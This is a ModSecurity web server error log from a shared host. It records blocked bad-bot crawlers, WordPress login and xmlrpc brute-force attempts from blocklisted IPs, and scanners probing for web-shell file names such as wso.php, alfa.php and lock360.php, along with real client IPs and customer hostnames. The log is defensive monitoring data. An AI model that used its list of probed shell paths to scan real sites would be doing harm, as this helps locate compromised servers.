[Tue May 26 17:17:09.754700 2026] [security2:error] [pid 869189:tid 869346] [client 185.191.171.12:64620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahWIPdB5TZSn88J_orrwoAAAABo"]
[Tue May 26 17:17:09.754829 2026] [security2:error] [pid 869189:tid 869346] [client 185.191.171.12:64620] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahWIPdB5TZSn88J_orrwoAAAABo"]
[Tue May 26 17:17:09.756993 2026] [security2:error] [pid 869189:tid 869384] [client 172.98.32.186:52537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWIPdB5TZSn88J_orrwlgAAAEA"]
[Tue May 26 17:17:10.043831 2026] [security2:error] [pid 869189:tid 869380] [client 185.251.19.120:42943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWIPdB5TZSn88J_orrwogAAADw"]
[Tue May 26 17:17:10.198786 2026] [security2:error] [pid 869189:tid 869357] [client 66.249.64.2:59397] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWIPdB5TZSn88J_orrwpQAAACU"], referer: https://www.yourstorybag.com/story-bites-how-to-retell-a-familiar-story/
[Tue May 26 17:17:10.198901 2026] [security2:error] [pid 869189:tid 869375] [client 66.249.64.3:55050] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWIPdB5TZSn88J_orrwoQAAADc"], referer: https://www.yourstorybag.com/story-bites-how-to-retell-a-familiar-story/
[Tue May 26 17:17:10.230222 2026] [security2:error] [pid 869189:tid 869364] [client 31.57.184.107:57373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.grappyfilms.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWIPtB5TZSn88J_orrwrAAAACw"]
[Tue May 26 17:17:11.121788 2026] [security2:error] [pid 869189:tid 869430] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIPtB5TZSn88J_orrwwwAAAG4"]
[Tue May 26 17:17:11.138124 2026] [security2:error] [pid 869189:tid 869390] [client 203.194.101.7:57081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIPtB5TZSn88J_orrwywAAAEY"]
[Tue May 26 17:17:11.138299 2026] [security2:error] [pid 869189:tid 869390] [client 203.194.101.7:57081] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIPtB5TZSn88J_orrwywAAAEY"]
[Tue May 26 17:17:13.238665 2026] [security2:error] [pid 869189:tid 869358] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIQNB5TZSn88J_orrw9gAAACY"]
[Tue May 26 17:17:14.789440 2026] [security2:error] [pid 869189:tid 869378] [client 20.205.111.246:12075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahWIQtB5TZSn88J_orrxGwAAADo"]
[Tue May 26 17:17:15.476693 2026] [security2:error] [pid 869189:tid 869437] [client 20.205.111.246:9887] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahWIQ9B5TZSn88J_orrxLQAAAHU"]
[Tue May 26 17:17:15.511780 2026] [security2:error] [pid 869189:tid 869308] [remote 160.250.186.220:41060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIQ9B5TZSn88J_orrxKQAAVXU"]
[Tue May 26 17:17:15.543359 2026] [security2:error] [pid 869189:tid 869409] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIQ9B5TZSn88J_orrxJQAAAFk"]
[Tue May 26 17:17:16.204219 2026] [security2:error] [pid 869189:tid 869415] [client 20.205.111.246:4086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWIRNB5TZSn88J_orrxPQAAAF8"]
[Tue May 26 17:17:16.980246 2026] [security2:error] [pid 869189:tid 869431] [client 20.205.111.246:9461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahWIRNB5TZSn88J_orrxUAAAAG8"]
[Tue May 26 17:17:17.327716 2026] [security2:error] [pid 869189:tid 869412] [client 45.132.227.33:45617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWIRdB5TZSn88J_orrxVAAAAFw"]
[Tue May 26 17:17:17.664498 2026] [security2:error] [pid 869189:tid 869425] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIRdB5TZSn88J_orrxWwAAAGk"]
[Tue May 26 17:17:17.740185 2026] [security2:error] [pid 869189:tid 869447] [client 20.205.111.246:9777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/al.php"] [unique_id "ahWIRdB5TZSn88J_orrxaQAAAH8"]
[Tue May 26 17:17:18.348296 2026] [security2:error] [pid 869189:tid 869420] [client 223.235.98.214:33041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIRtB5TZSn88J_orrxdgAAAGQ"]
[Tue May 26 17:17:18.348411 2026] [security2:error] [pid 869189:tid 869420] [client 223.235.98.214:33041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIRtB5TZSn88J_orrxdgAAAGQ"]
[Tue May 26 17:17:18.456185 2026] [security2:error] [pid 869189:tid 869360] [client 20.205.111.246:7344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahWIRtB5TZSn88J_orrxdwAAACg"]
[Tue May 26 17:17:19.180989 2026] [security2:error] [pid 869189:tid 869365] [client 20.205.111.246:12247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/as.php"] [unique_id "ahWIR9B5TZSn88J_orrxhAAAAC0"]
[Tue May 26 17:17:19.669255 2026] [security2:error] [pid 869189:tid 869372] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIR9B5TZSn88J_orrxigAAADQ"]
[Tue May 26 17:17:19.878671 2026] [security2:error] [pid 869189:tid 869414] [client 20.205.111.246:10141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahWIR9B5TZSn88J_orrxnwAAAF4"]
[Tue May 26 17:17:20.688656 2026] [security2:error] [pid 869189:tid 869429] [client 20.205.111.246:1782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/abc.php"] [unique_id "ahWISNB5TZSn88J_orrxvgAAAG0"]
[Tue May 26 17:17:21.016866 2026] [security2:error] [pid 869189:tid 869197] [remote 103.91.67.202:61662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWISNB5TZSn88J_orrxwwAAZgY"]
[Tue May 26 17:17:21.395339 2026] [security2:error] [pid 869189:tid 869403] [client 20.205.111.246:1746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahWISdB5TZSn88J_orrx0AAAAFM"]
[Tue May 26 17:17:21.396388 2026] [security2:error] [pid 869189:tid 869347] [client 203.194.101.7:57352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWISdB5TZSn88J_orrx0QAAABs"]
[Tue May 26 17:17:21.396502 2026] [security2:error] [pid 869189:tid 869347] [client 203.194.101.7:57352] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWISdB5TZSn88J_orrx0QAAABs"]
[Tue May 26 17:17:21.547529 2026] [security2:error] [pid 869189:tid 869425] [client 17.241.227.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIR9B5TZSn88J_orrxowAAAGk"]
[Tue May 26 17:17:22.097290 2026] [security2:error] [pid 869189:tid 869374] [client 20.205.111.246:3630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/autoload_classmap.php"] [unique_id "ahWIStB5TZSn88J_orrx5wAAADY"]
[Tue May 26 17:17:22.614307 2026] [security2:error] [pid 869189:tid 869366] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIStB5TZSn88J_orrx7QAAAC4"]
[Tue May 26 17:17:22.892340 2026] [security2:error] [pid 869189:tid 869210] [remote 45.136.17.84:44726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.17.136.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahWIStB5TZSn88J_orrx9gAAExM"]
[Tue May 26 17:17:23.604103 2026] [security2:error] [pid 869189:tid 869367] [client 20.205.111.246:12044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/asus.php"] [unique_id "ahWIS9B5TZSn88J_orryFgAAAC8"]
[Tue May 26 17:17:24.402510 2026] [security2:error] [pid 869189:tid 869387] [client 20.205.111.246:12263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWITNB5TZSn88J_orryMgAAAEM"]
[Tue May 26 17:17:24.416127 2026] [security2:error] [pid 869189:tid 869368] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWITNB5TZSn88J_orryIAAAADA"]
[Tue May 26 17:17:25.130401 2026] [security2:error] [pid 869189:tid 869425] [client 20.205.111.246:12066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/atomlib.php"] [unique_id "ahWITdB5TZSn88J_orryVwAAAGk"]
[Tue May 26 17:17:25.130483 2026] [security2:error] [pid 869189:tid 869443] [client 74.7.230.41:52208] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.foresightbuildingsolutions.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWITdB5TZSn88J_orryVgAAez0"]
[Tue May 26 17:17:25.371814 2026] [security2:error] [pid 869189:tid 869403] [client 185.92.25.51:37981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/bless.php"] [unique_id "ahWITdB5TZSn88J_orryXAAAAFM"]
[Tue May 26 17:17:25.473356 2026] [security2:error] [pid 869189:tid 869438] [client 27.145.0.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWITdB5TZSn88J_orryUQAAAHY"]
[Tue May 26 17:17:25.850793 2026] [security2:error] [pid 869189:tid 869440] [client 185.192.71.173:46371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/O-Simple.php"] [unique_id "ahWITdB5TZSn88J_orryZgAAAHg"]
[Tue May 26 17:17:25.906117 2026] [security2:error] [pid 869189:tid 869407] [client 20.205.111.246:6021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/alfa-rex.php7"] [unique_id "ahWITdB5TZSn88J_orryZwAAAFc"]
[Tue May 26 17:17:26.666425 2026] [security2:error] [pid 869189:tid 869408] [client 20.205.111.246:12633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahWITtB5TZSn88J_orryhwAAAFg"]
[Tue May 26 17:17:26.813001 2026] [security2:error] [pid 869189:tid 869326] [client 185.92.25.49:48681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/lock360.php"] [unique_id "ahWITtB5TZSn88J_orryiQAAAAY"]
[Tue May 26 17:17:27.074041 2026] [security2:error] [pid 869189:tid 869384] [client 66.249.70.141:60323] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWIT9B5TZSn88J_orrymQAAAEA"]
[Tue May 26 17:17:27.153730 2026] [security2:error] [pid 869189:tid 869328] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWITtB5TZSn88J_orryjgAAAAg"]
[Tue May 26 17:17:27.215593 2026] [security2:error] [pid 869189:tid 869345] [client 91.230.225.120:41359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/zwso.php"] [unique_id "ahWIT9B5TZSn88J_orrymgAAABk"]
[Tue May 26 17:17:27.402157 2026] [security2:error] [pid 869189:tid 869442] [client 20.205.111.246:1766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahWIT9B5TZSn88J_orryoQAAAHo"]
[Tue May 26 17:17:27.700415 2026] [security2:error] [pid 869189:tid 869338] [client 91.230.225.134:49679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/chosen.php"] [unique_id "ahWIT9B5TZSn88J_orryqAAAABI"]
[Tue May 26 17:17:28.117351 2026] [security2:error] [pid 869189:tid 869363] [client 185.92.25.50:53007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/about.php"] [unique_id "ahWIUNB5TZSn88J_orrysgAAACs"]
[Tue May 26 17:17:28.261906 2026] [security2:error] [pid 869189:tid 869382] [client 20.205.111.246:1321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/bless.php"] [unique_id "ahWIUNB5TZSn88J_orryvAAAAD4"]
[Tue May 26 17:17:28.565046 2026] [security2:error] [pid 869189:tid 869388] [client 185.192.71.172:25745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/admin.php"] [unique_id "ahWIUNB5TZSn88J_orrywAAAAEQ"]
[Tue May 26 17:17:28.999440 2026] [security2:error] [pid 869189:tid 869405] [client 20.205.111.246:4760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahWIUNB5TZSn88J_orryywAAAFU"]
[Tue May 26 17:17:29.041861 2026] [security2:error] [pid 869189:tid 869429] [client 223.235.98.214:14143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIUNB5TZSn88J_orryygAAAG0"]
[Tue May 26 17:17:29.042056 2026] [security2:error] [pid 869189:tid 869429] [client 223.235.98.214:14143] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIUNB5TZSn88J_orryygAAAG0"]
[Tue May 26 17:17:29.097022 2026] [security2:error] [pid 869189:tid 869400] [client 185.92.25.63:43799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/mah.php"] [unique_id "ahWIUdB5TZSn88J_orryzAAAAFA"]
[Tue May 26 17:17:29.519386 2026] [security2:error] [pid 869189:tid 869419] [client 91.230.225.120:21247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/.wp/wso.php"] [unique_id "ahWIUdB5TZSn88J_orry4gAAAGM"]
[Tue May 26 17:17:29.569746 2026] [security2:error] [pid 869189:tid 869354] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIUdB5TZSn88J_orry0gAAACI"]
[Tue May 26 17:17:29.701973 2026] [security2:error] [pid 869189:tid 869334] [client 20.205.111.246:10115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahWIUdB5TZSn88J_orry4wAAAA4"]
